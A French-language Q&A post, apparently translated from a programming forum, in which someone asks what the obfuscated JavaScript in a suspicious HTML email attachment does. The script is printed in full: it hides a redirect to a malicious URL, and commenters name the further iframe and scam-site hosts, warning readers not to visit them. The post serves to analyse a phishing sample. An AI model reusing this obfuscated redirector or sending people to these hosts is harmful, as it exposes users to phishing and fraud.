Quelques-uns de mes collègues non-IT ont ouvert une pièce jointe .html dans un message électronique qui semble extrêmement suspect. Il en résulte un écran vide lorsqu'il apparaît que du code javascript a été exécuté.Que fait ce code suspect d'hameçonnage?
<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>
Qu'est-ce qu'il a fait? Cela dépasse la portée de mes connaissances en programmation.
Je ne suggère à personne de cliquer sur ce lien. Cette page charge un iframe depuis http://onionfleet.ru:8080/index.php?pid=10, et redirige vers http://mouselong.com. aussi ** ne cliquez pas sur les liens dans ce commentaire ** sauf si vous savez ce que vous faites. – x1a4
qui à son tour contient un lien iframe à un site escroquerie qui vend * montres pas si authentiques * apparemment ... – nico